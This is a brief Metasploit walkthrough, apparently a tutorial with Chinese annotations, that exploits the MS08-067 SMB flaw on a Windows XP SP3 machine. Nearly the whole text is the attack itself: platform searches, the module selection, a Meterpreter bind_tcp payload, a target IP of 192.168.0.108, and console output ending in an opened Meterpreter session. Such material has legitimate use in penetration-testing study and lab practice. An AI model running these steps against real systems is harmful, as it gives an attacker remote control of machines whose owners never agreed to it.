msf > search platform: windows xp sp3 msf > search platform: windows 10 msf > search platform: android
msf > info exploit/windows/smb/ms08_067_netapi 使用info查看漏洞信息.
msf > use exploit/windows/smb/ms08_067_netapi > set payload windows/meterpreter/bind_tcp > set RHOST 192.168.0.108 (设置目标主机IP地址) > exploit 设定攻击方式.攻击ip
攻击成功: [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese [*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK) [*] Attempting to trigger the vulnerability... [*] Sending stage (751104 bytes) to 192.168.0.108 [*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32